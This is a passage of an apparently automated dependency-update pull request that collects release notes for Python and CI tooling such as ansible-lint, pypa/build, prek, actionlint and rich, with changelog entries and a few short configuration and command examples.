[`v1.0.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.0)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1...v1)

#### Features

- feat: add pydoclint hook definition
([#&#8203;99](https://redirect.github.com/ansible/actions/issues/99))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Fixes

- fix: fix shellcheck hook in local testing
([#&#8203;98](https://redirect.github.com/ansible/actions/issues/98))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: use sh when calling system hooks
([#&#8203;97](https://redirect.github.com/ansible/actions/issues/97))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: cancel current workflow when autofix is applied
([#&#8203;95](https://redirect.github.com/ansible/actions/issues/95))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: prevent prek node install from touching package-lock.json file
([#&#8203;94](https://redirect.github.com/ansible/actions/issues/94))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies
([#&#8203;93](https://redirect.github.com/ansible/actions/issues/93))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1`](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)

</details>

<details>
<summary>ansible/ansible-lint (ansible/ansible-lint)</summary>

###
[`v26.4.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.4.0)

[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.3.0...v26.4.0)

#### Fixes

- fix: remove deprecated apt\_key module from examples and builtins
([#&#8203;5000](https://redirect.github.com/ansible/ansible-lint/issues/5000))
[@&#8203;cidrblock](https://redirect.github.com/cidrblock)
- fix(security): update dependencies \[SECURITY]
([#&#8203;5010](https://redirect.github.com/ansible/ansible-lint/issues/5010))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix: avoid permission error when linting /tmp files
([#&#8203;5009](https://redirect.github.com/ansible/ansible-lint/issues/5009))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: reapply false positive patch for no-changed-when rule
([#&#8203;4989](https://redirect.github.com/ansible/ansible-lint/issues/4989))
[@&#8203;Red-GV](https://redirect.github.com/Red-GV)
- docs: fix inaccuracies found during documentation audit
([#&#8203;4999](https://redirect.github.com/ansible/ansible-lint/issues/4999))
[@&#8203;cidrblock](https://redirect.github.com/cidrblock)
- fix: support collection format in mock\_roles
([#&#8203;4980](https://redirect.github.com/ansible/ansible-lint/issues/4980))
[@&#8203;emmanuel-ferdman](https://redirect.github.com/emmanuel-ferdman)
- fix(security): update dependencies \[SECURITY]
([#&#8203;4993](https://redirect.github.com/ansible/ansible-lint/issues/4993))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

#### Maintenance

- chore: update hooks
([#&#8203;5008](https://redirect.github.com/ansible/ansible-lint/issues/5008))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- chore: implement workaround for coverage merging failure
([#&#8203;5006](https://redirect.github.com/ansible/ansible-lint/issues/5006))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- Add support for upcoming Ubuntu 26.04
([#&#8203;4995](https://redirect.github.com/ansible/ansible-lint/issues/4995))
[@&#8203;Andiroid](https://redirect.github.com/Andiroid)
- chore(deps): update all dependencies pep621
([#&#8203;4994](https://redirect.github.com/ansible/ansible-lint/issues/4994))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): bump black from 26.1.0 to 26.3.1 in /.config
([#&#8203;4991](https://redirect.github.com/ansible/ansible-lint/issues/4991))
@&#8203;[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)

###
[`v26.3.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.3.0)

[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.2.0...v26.3.0)

##### Features

- feat: add jinja2-template-extension opt-in rule
([#&#8203;4979](https://redirect.github.com/ansible/ansible-lint/issues/4979))
[@&#8203;djdanielsson](https://redirect.github.com/djdanielsson)

##### Fixes

- fix: Add missing version\_changed var to ComplexityRule class
([#&#8203;4987](https://redirect.github.com/ansible/ansible-lint/issues/4987))
[@&#8203;thrashwerk](https://redirect.github.com/thrashwerk)

##### Maintenance

- chore: pre-commit autoupdate
([#&#8203;4986](https://redirect.github.com/ansible/ansible-lint/issues/4986))
@&#8203;[pre-commit-ci\[bot\]](https://redirect.github.com/apps/pre-commit-ci)
- chore(deps): update all dependencies pep621
([#&#8203;4984](https://redirect.github.com/ansible/ansible-lint/issues/4984))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;4983](https://redirect.github.com/ansible/ansible-lint/issues/4983))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps-dev): bump minimatch from 9.0.5 to 10.2.4 in /test/schemas
([#&#8203;4982](https://redirect.github.com/ansible/ansible-lint/issues/4982))
@&#8203;[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)

</details>

<details>
<summary>ansible/team-devtools (ansible/team-devtools)</summary>

###
[`v26.4.0`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.4.0)

[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.2...v26.4.0)

#### Fixes

- fix: stop if unsigned commits are detected
([#&#8203;438](https://redirect.github.com/ansible/team-devtools/issues/438))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update pep621
([#&#8203;432](https://redirect.github.com/ansible/team-devtools/issues/432))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v26.2.2`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.2)

[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.1...v26.2.2)

#### Maintenance

- chore: dump event info for test pipeline
([#&#8203;427](https://redirect.github.com/ansible/team-devtools/issues/427))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- chore(deps): update all dependencies
([#&#8203;426](https://redirect.github.com/ansible/team-devtools/issues/426))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v26.2.1`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.1)

[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.0...v26.2.1)

#### Fixes

- fix: make slack notification use markdown
([#&#8203;424](https://redirect.github.com/ansible/team-devtools/issues/424))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make slack alert easier to read
([#&#8203;423](https://redirect.github.com/ansible/team-devtools/issues/423))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

</details>

<details>
<summary>astral-sh/uv-pre-commit (astral-sh/uv-pre-commit)</summary>

###
[`v0.11.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.8)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.7...0.11.8)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.8>

###
[`v0.11.7`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.7)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.6...0.11.7)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.7>

###
[`v0.11.6`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.6)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.5...0.11.6)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.6>

###
[`v0.11.5`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.5)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.4...0.11.5)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.5>

###
[`v0.11.4`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.4)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.3...0.11.4)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.4>

###
[`v0.11.3`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.3)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.2...0.11.3)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.3>

###
[`v0.11.2`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.2)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.1...0.11.2)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.2>

###
[`v0.11.1`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.1)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.0...0.11.1)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.1>

###
[`v0.11.0`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.0)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.12...0.11.0)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.0>

###
[`v0.10.12`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.12)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.11...0.10.12)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.12>

###
[`v0.10.11`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.11)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.10...0.10.11)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.11>

###
[`v0.10.10`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.10)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.9...0.10.10)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.10>

###
[`v0.10.9`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.9)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.8...0.10.9)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.9>

###
[`v0.10.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.8)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.7...0.10.8)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.8>

</details>

<details>
<summary>biomejs/pre-commit (biomejs/pre-commit)</summary>

###
[`v2.4.14`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)

###
[`v2.4.13`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)

###
[`v2.4.12`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)

###
[`v2.4.11`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)

###
[`v2.4.10`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)

###
[`v2.4.9`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)

###
[`v2.4.8`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)

###
[`v2.4.7`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)

###
[`v2.4.6`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)

###
[`v2.4.5`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)

</details>

<details>
<summary>pypa/build (build)</summary>

###
[`v1.5.0`](https://redirect.github.com/pypa/build/releases/tag/1.5.0)

[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.4...1.5.0)

<!-- Release notes generated using configuration in .github/release.yml
at 1.5.0 -->

#### What's Changed

- ci: try to improve release docs by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1051](https://redirect.github.com/pypa/build/pull/1051)
- feat: drop 3.9, require 3.10+ by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1036](https://redirect.github.com/pypa/build/pull/1036)
- chore: tox toml by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1033](https://redirect.github.com/pypa/build/pull/1033)
- fix: api should not ignore installed, only CLI by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1056](https://redirect.github.com/pypa/build/pull/1056)

**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.4...1.5.0>

###
[`v1.4.4`](https://redirect.github.com/pypa/build/releases/tag/1.4.4)

[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.3...1.4.4)

<!-- Release notes generated using configuration in .github/release.yml
at 1.4.4 -->

#### What's Changed

- 🐛 fix(release): generate consistent CHANGELOG heading levels by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1032](https://redirect.github.com/pypa/build/pull/1032)
- docs: move source links by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1034](https://redirect.github.com/pypa/build/pull/1034)
- revert: drop PEP 660 change by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1039](https://redirect.github.com/pypa/build/pull/1039)
- fix: ignore installed when running pip by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1040](https://redirect.github.com/pypa/build/pull/1040)
- fix: revert part of
[#&#8203;973](https://redirect.github.com/pypa/build/issues/973) by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1044](https://redirect.github.com/pypa/build/pull/1044)
- chore: report coverage failure lines by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1046](https://redirect.github.com/pypa/build/pull/1046)
- tests: fix issue with uv run by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1048](https://redirect.github.com/pypa/build/pull/1048)
- docs: reorganize testing docs for copy/paste by
[@&#8203;abitrolly](https://redirect.github.com/abitrolly) in
[#&#8203;1043](https://redirect.github.com/pypa/build/pull/1043)
- tests: keep environment from leaking in Python 3.15 by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1049](https://redirect.github.com/pypa/build/pull/1049)
- docs: fix issue with changelog generation by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1050](https://redirect.github.com/pypa/build/pull/1050)

**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.3...1.4.4>

###
[`v1.4.3`](https://redirect.github.com/pypa/build/releases/tag/1.4.3)

[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.2...1.4.3)

<!-- Release notes generated using configuration in .github/release.yml
at 1.4.3 -->

##### What's Changed

- 🐛 fix(api): resolve thread-safety races in build API by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1015](https://redirect.github.com/pypa/build/pull/1015)
- 🐛 fix(builder): validate backend-path entries exist on disk by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1016](https://redirect.github.com/pypa/build/pull/1016)
- test: cover config settings build paths by
[@&#8203;terminalchai](https://redirect.github.com/terminalchai) in
[#&#8203;992](https://redirect.github.com/pypa/build/pull/992)
- Add kind=(step, ) for root messages with \* by
[@&#8203;abitrolly](https://redirect.github.com/abitrolly) in
[#&#8203;973](https://redirect.github.com/pypa/build/pull/973)
- fix: correct changelog category ordering by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1017](https://redirect.github.com/pypa/build/pull/1017)
- 🐛 fix(cli): show full dependency chain in missing deps error by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1019](https://redirect.github.com/pypa/build/pull/1019)
- tests: fully annotate by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1020](https://redirect.github.com/pypa/build/pull/1020)
- chore: lazy imports by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1021](https://redirect.github.com/pypa/build/pull/1021)
- chore: adding more ruff codes by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1022](https://redirect.github.com/pypa/build/pull/1022)
- tests: improve annotations by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1023](https://redirect.github.com/pypa/build/pull/1023)
- 🧪 test(coverage): achieve 100% test coverage by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1018](https://redirect.github.com/pypa/build/pull/1018)
- chore: add ruff PT by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1025](https://redirect.github.com/pypa/build/pull/1025)
- chore: add ruff PYI by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1026](https://redirect.github.com/pypa/build/pull/1026)
- chore: add ruff SIM/RET by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1028](https://redirect.github.com/pypa/build/pull/1028)
- 🐛 fix(env): strip PYTHONPATH from isolated builds by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1024](https://redirect.github.com/pypa/build/pull/1024)
- chore: use ruff ALL by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1029](https://redirect.github.com/pypa/build/pull/1029)
- 🐛 fix(env): prevent pip credential hang with private indexes by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1030](https://redirect.github.com/pypa/build/pull/1030)
- 🐛 fix(check\_dependency): verify URL reqs via PEP 610 by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1027](https://redirect.github.com/pypa/build/pull/1027)

##### New Contributors

- [@&#8203;terminalchai](https://redirect.github.com/terminalchai) made
their first contribution in
[#&#8203;992](https://redirect.github.com/pypa/build/pull/992)

**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.2...1.4.3>

</details>

<details>
<summary>pallets/click (click)</summary>

###
[`v8.3.3`](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)

[Compare
Source](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)

</details>

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

###
[`v3.29.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.29.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.28.0...3.29.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.29.0 -->

#### What's Changed

- 🐛 fix(async): use single-thread executor for lock consistency by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#533](https://redirect.github.com/tox-dev/filelock/pull/533)
- ✨ feat(soft): enable stale lock detection on Windows by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#534](https://redirect.github.com/tox-dev/filelock/pull/534)

**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.28.0...3.29.0>

###
[`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.28.0 -->

##### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.27.0...3.28.0>

</details>

<details>
<summary>j178/prek (prek)</summary>

###
[`v0.3.11`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0311)

Released on 2026-04-27.

##### Highlights

Hook entries now have an explicit `shell` option for shell snippets. Set
`shell: sh`, `bash`, `pwsh`, `powershell`, or `cmd` when an entry should
be
evaluated by that shell; leaving it unset keeps prek's direct argv
execution.

`prek auto-update` can now filter tag candidates before choosing an
update.
Both options take glob patterns: use `--include-tag` to only consider
matching
tag names, and `--exclude-tag` to skip matching tags such as moving tags
or
prereleases.

##### Enhancements

- Add `auto-update --exclude-repo <repo>` to skip repos
([#&#8203;1983](https://redirect.github.com/j178/prek/pull/1983))
- Add `auto-update --exit-code` to exit with non-zero on updates
([#&#8203;2002](https://redirect.github.com/j178/prek/pull/2002))
- Add `auto-update --include-tag <pattern>`/`--exclude-tag <pattern>` to
filter tags
([#&#8203;1984](https://redirect.github.com/j178/prek/pull/1984))
- Adds an explicit `shell` hook option for entries that should run as
shell source
([#&#8203;2004](https://redirect.github.com/j178/prek/pull/2004))
- Make `--hook-dir` optional for hook-impl
([#&#8203;1989](https://redirect.github.com/j178/prek/pull/1989))
- Skip shim warning when `--script-version` is missing
([#&#8203;1990](https://redirect.github.com/j178/prek/pull/1990))

##### Bug fixes

- Install Ruby executable in gem bin
([#&#8203;2017](https://redirect.github.com/j178/prek/pull/2017))
- Use dedicated Android npm package
([#&#8203;1982](https://redirect.github.com/j178/prek/pull/1982))
- Use stable repo keys without breaking cached clones
([#&#8203;1995](https://redirect.github.com/j178/prek/pull/1995))

##### Documentation

- Explain prek name
([#&#8203;1980](https://redirect.github.com/j178/prek/pull/1980))
- Clarify `pass_filenames` concurrency docs
([#&#8203;1999](https://redirect.github.com/j178/prek/pull/1999))
- Reorganize documentation references
([#&#8203;2005](https://redirect.github.com/j178/prek/pull/2005))
- Clarify hook author manifest env docs
([#&#8203;1991](https://redirect.github.com/j178/prek/pull/1991))
- docs: add Sentry to users list
([#&#8203;1981](https://redirect.github.com/j178/prek/pull/1981))

##### Contributors

- [@&#8203;j178](https://redirect.github.com/j178)

###
[`v0.3.10`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0310)

Released on 2026-04-21.

##### Enhancements

- Disallow rev for non-remote repos in schema
([#&#8203;1964](https://redirect.github.com/j178/prek/pull/1964))
- Hide up-to-date output in non-verbose mode
([#&#8203;1942](https://redirect.github.com/j178/prek/pull/1942))
- Improve merge conflict marker detection
([#&#8203;1937](https://redirect.github.com/j178/prek/pull/1937))
- Keep finished hooks visible
([#&#8203;1967](https://redirect.github.com/j178/prek/pull/1967))
- Preserve frozen comment spacing in auto-update
([#&#8203;1945](https://redirect.github.com/j178/prek/pull/1945))
- Reimplement `@j178/prek` npm package
([#&#8203;1973](https://redirect.github.com/j178/prek/pull/1973))

##### Bug fixes

- Prefer stable Rust toolchains
([#&#8203;1974](https://redirect.github.com/j178/prek/pull/1974))

##### Documentation

- Add `SKILL.md` for prek
([#&#8203;1950](https://redirect.github.com/j178/prek/pull/1950))
- Document `gh skill install j178/prek prek` to install prek skill for
agents ([#&#8203;1951](https://redirect.github.com/j178/prek/pull/1951))
- Improve compatibility and migration docs
([#&#8203;1940](https://redirect.github.com/j178/prek/pull/1940))

##### Other changes

- Sync latest identify tags
([#&#8203;1947](https://redirect.github.com/j178/prek/pull/1947))

##### Contributors

- [@&#8203;github-actions](https://redirect.github.com/github-actions)
- [@&#8203;renovate](https://redirect.github.com/renovate)
- [@&#8203;j178](https://redirect.github.com/j178)

###
[`v0.3.9`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#039)

Released on 2026-04-13.

##### Highlight

`prek auto-update` is now stricter about pinned revisions and more
useful in CI.
It now keeps `rev` and `# frozen:` comments in sync, can detect
[impostor commits](https://docs.zizmor.sh/audits/#impostor-commit) when
validating pinned SHAs,
and lets you use `prek auto-update --check` to fail on both available
updates and frozen-ref
mismatches without rewriting the config.

Examples:

```console
$ prek auto-update

# updates revs and repairs stale `# frozen:` comments

$ prek auto-update --freeze

# writes frozen SHAs with matching `# frozen: <tag>` comments

$ prek auto-update --check

# exits non-zero when updates are available, a `# frozen:` comment is stale,
# or a pinned SHA does not belong to the fetched upstream refs
```

##### Enhancements

- Check and sync frozen comments during auto-update
([#&#8203;1896](https://redirect.github.com/j178/prek/pull/1896))
- Handle impostor commits in auto-update
([#&#8203;1919](https://redirect.github.com/j178/prek/pull/1919))
- Add experimental `language: dotnet` support
([#&#8203;1871](https://redirect.github.com/j178/prek/pull/1871))
- Honor repo and worktree `core.hooksPath`
([#&#8203;1892](https://redirect.github.com/j178/prek/pull/1892))
- Add `prek run --no-fail-fast` to override config file
([#&#8203;1859](https://redirect.github.com/j178/prek/pull/1859))
- Add `forbid-new-submodules` as builtin hook
([#&#8203;1853](https://redirect.github.com/j178/prek/pull/1853))
- Clean stale patch files in `cache gc`
([#&#8203;1877](https://redirect.github.com/j178/prek/pull/1877))
- Display auto-update results by config entry
([#&#8203;1922](https://redirect.github.com/j178/prek/pull/1922))
- Restrict patch directory permissions
([#&#8203;1876](https://redirect.github.com/j178/prek/pull/1876))
- Show tag names in `auto-update --freeze` output
([#&#8203;1916](https://redirect.github.com/j178/prek/pull/1916))
- Use a bitset for hook stages
([#&#8203;1860](https://redirect.github.com/j178/prek/pull/1860))

##### Bug fixes

- Canonicalize CWD and GIT\_ROOT paths
([#&#8203;1878](https://redirect.github.com/j178/prek/pull/1878))
- Ensure quotes are added for non-string revisions in `auto-update`
([#&#8203;1936](https://redirect.github.com/j178/prek/pull/1936))

##### Documentation

- Update docs for case of hooks modifying files with a non-zero exit
code ([#&#8203;1879](https://redirect.github.com/j178/prek/pull/1879))

##### Contributors

- [@&#8203;RicardoVercetti](https://redirect.github.com/RicardoVercetti)
-
[@&#8203;nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
- [@&#8203;renovate](https://redirect.github.com/renovate)
- [@&#8203;sadjow](https://redirect.github.com/sadjow)
- [@&#8203;j178](https://redirect.github.com/j178)

</details>

<details>
<summary>rhysd/actionlint (rhysd/actionlint)</summary>

###
[`v1.7.12`](https://redirect.github.com/rhysd/actionlint/blob/HEAD/CHANGELOG.md#v1712---2026-03-30)

[Compare
Source](https://redirect.github.com/rhysd/actionlint/compare/v1.7.11...v1.7.12)

- Support the [`timezone` configuration in
`on.schedule`](https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#onschedule)
with checks for IANA timezone string. See the
[documentation](https://redirect.github.com/rhysd/actionlint/blob/main/docs/checks.md#check-cron-syntax-and-timezone)
for more details. Note that actionlint starts to embed the timezone
database in the executables from this version so the binary sizes
slightly increase.
([#&#8203;641](https://redirect.github.com/rhysd/actionlint/issues/641),
thanks
[@&#8203;martincostello](https://redirect.github.com/martincostello))
  ```yaml
  on:
    schedule:
      # ERROR: The timezone is not a valid IANA timezone string
      - cron: '*/5 * * * *'
        timezone: 'Asia/Somewhere'
  ```
- Support the [`jobs.<job_name>.environment.deployment`
configuration](https://docs.github.com/en/actions/how-tos/deploy/configure-and-manage-deployments/control-deployments#using-environments-without-deployments).
([#&#8203;639](https://redirect.github.com/rhysd/actionlint/issues/639),
thanks [@&#8203;springmeyer](https://redirect.github.com/springmeyer))
- Support the [`macos-26-intel` runner
label](https://github.blog/changelog/2026-02-26-macos-26-is-now-generally-available-for-github-hosted-runners/).
([#&#8203;629](https://redirect.github.com/rhysd/actionlint/issues/629),
thanks [@&#8203;hugovk](https://redirect.github.com/hugovk))
- Fix the [table of webhook activity
types](https://redirect.github.com/rhysd/actionlint/blob/main/all_webhooks.go)
are outdated by rebuilding the [script to scrape the
table](https://redirect.github.com/rhysd/actionlint/tree/main/scripts/generate-webhook-events)
from scratch.
- Support Go 1.26 and drop the support for Go 1.24. Now supported
versions are 1.25 and 1.26.
- Tests are run on arm64 Windows in CI.
- Update the popular actions data set to the latest.

\[Changes]\[v1.7.12]

<a id="v1.7.11"></a>

</details>

<details>
<summary>Textualize/rich (rich)</summary>

###
[`v15.0.0`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1500---2026-04-12)

[Compare
Source](https://redirect.github.com/Textualize/rich/compare/v14.3.4...v15.0.0)

##### Changed

- Breaking change: Dropped support for Python3.8

##### Fixed

- Fixed empty print ignoring the `end` parameter
[#&#8203;4075](https://redirect.github.com/Textualize/rich/pull/4075)
- Fixed `Text.from_ansi` removing newlines
[#&#8203;4076](https://redirect.github.com/Textualize/rich/pull/4076)
- Fixed `FileProxy.isatty` not proxying
[#&#8203;4077](https://redirect.github.com/Textualize/rich/pull/4077)
- Fixed inline code in Markdown tables cells
[#&#8203;4079](https://redirect.github.com/Textualize/rich/pull/4079)

###
[`v14.3.4`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1434---2026-04-11)

[Compare
Source](https://redirect.github.com/Textualize/rich/compare/v14.3.3...v14.3.4)

##### Changed

- Improved import time with lazy loading
[#&#8203;4070](https://redirect.github.com/Textualize/rich/pull/4070)
- Changed link id generation to avoid random number generation at
runtime
[#&#8203;3845](https://redirect.github.com/Textualize/rich/pull/3845)

</details>

<details>
<summary>astral-sh/ruff (ruff)</summary>

###
